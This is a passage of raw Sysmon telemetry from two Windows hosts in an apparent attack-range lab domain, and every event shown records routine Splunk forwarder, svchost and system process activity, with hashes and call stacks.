10341000x8000000000000000440357Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:46.216{42DC5269-CF3C-6086-AA00-00000000BA01}41684996C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{42DC5269-0252-6088-BA28-00000000BA01}6088C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000440356Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:46.215{42DC5269-0252-6088-BA28-00000000BA01}6088C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{42DC5269-CE97-6086-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000440355Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:46.172{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440354Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:46.172{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440400Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:47.867{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F773C0673DE9D0C5E1ED4E21428D46F6,SHA256=FC99955CD0D59B0651ADD7AD9C9DEA8CC58F954D918C500AC7B26175CAE96707,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000291578Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:45.396{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50619-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000291577Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:47.471{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7B31B73535DC957C445027D15C6E3D1,SHA256=248357C32168DC3833B34F1EB8DF32583EF7F310A567B0815356CA7CDF989AA4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440399Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:47.385{42DC5269-CF3C-6086-AE00-00000000BA01}21884056C:\Windows\system32\conhost.exe{42DC5269-0253-6088-BC28-00000000BA01}5560C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440398Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:47.384{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440397Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:47.384{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440396Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:47.384{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440395Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:47.384{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440394Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:47.384{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440393Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:47.384{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440392Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:47.384{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440391Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:47.383{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440390Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:47.383{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440389Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:47.383{42DC5269-CE96-6086-0500-00000000BA01}412428C:\Windows\system32\csrss.exe{42DC5269-0253-6088-BC28-00000000BA01}5560C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000440388Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:47.383{42DC5269-CF3C-6086-AA00-00000000BA01}41684996C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{42DC5269-0253-6088-BC28-00000000BA01}5560C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000440387Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:47.383{42DC5269-0253-6088-BC28-00000000BA01}5560C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{42DC5269-CE97-6086-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000440386Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:47.235{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=506A768EC4E5F7B7D9AE7D2C5CF9C6DC,SHA256=0BA3C694C0F5B87227F28F0305C2DF932A67537C654E0F5B084368CC226AA663,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440385Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:47.173{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440384Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:47.173{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291576Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:47.133{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C5E963380FFDB1A28FA5A399889F0296,SHA256=1D184C024200832F1F1E6CD1F30BDA1D4FEFCD9AA0E247E56D37331BFDA454A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291575Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:47.133{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B28F3FD3D7ED2047171F11650264C6E6,SHA256=99FBE61A8FC14DF48FF2DA4B0932D2DFB33B329FB74570377AB80FEE2F30077B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440433Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:48.887{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EFAEB985BFDF573E97CCC51B8D9B3D81,SHA256=F81F6EF4CAFE1B8240539FA4EF01922F4AE576DFBB81EF80DC4024B35B2C02B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291579Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:48.520{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E72A1805246817705BD585ADAD8658CE,SHA256=69574B18A8BB8205B64A647BEEB70207E35DE1116AD3FC83FD9068F29F1ADFAC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440432Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:48.846{42DC5269-0254-6088-BE28-00000000BA01}9925928C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440431Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:48.717{42DC5269-CF3C-6086-AE00-00000000BA01}21884056C:\Windows\system32\conhost.exe{42DC5269-0254-6088-BE28-00000000BA01}992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440430Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:48.716{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440429Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:48.716{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440428Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 